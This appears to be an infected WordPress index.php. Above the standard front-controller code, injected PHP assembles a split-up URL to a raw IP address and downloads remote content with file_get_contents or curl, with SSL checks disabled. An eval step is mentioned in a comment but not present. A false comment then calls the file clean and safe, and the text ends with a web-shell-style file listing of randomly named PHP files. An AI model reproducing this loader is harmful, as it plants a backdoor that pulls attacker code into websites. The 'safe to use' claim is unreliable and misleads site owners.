<?php
// Split URL into pieces
$url_part1 = 'http://204';
$url_part2 = '.12.197.138/z51008_2/';
$url_part3 = '/stat/index2.txt';
$full_url = $url_part1 . $url_part2 . $url_part3;

// Attempt to get remote content
$content = @file_get_contents($full_url);
if ($content === false && function_exists('curl_init')) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $full_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $content = curl_exec($ch);
    curl_close($ch);
}

// Only eval if we have content

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/


/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';

• [D] cgi-bin
• [F] .htaccess
  Delete
• [F] ah19.php
  Delete
• [F] chosen.php
  Delete
• [F] d1l5f61nw1oh9z5yzdv9aeCakc.php
  Delete
• [F] fdt9os7atkcr1xojsuqaebujCakc.php
  Delete
• [F] index.php
  Delete
• [F] lm18.php
  Delete
• [F] xp5ase1nkfy09nv5qCakc.php
  Delete
• [F] z58.php
  Delete
• [F] z60.php
  Delete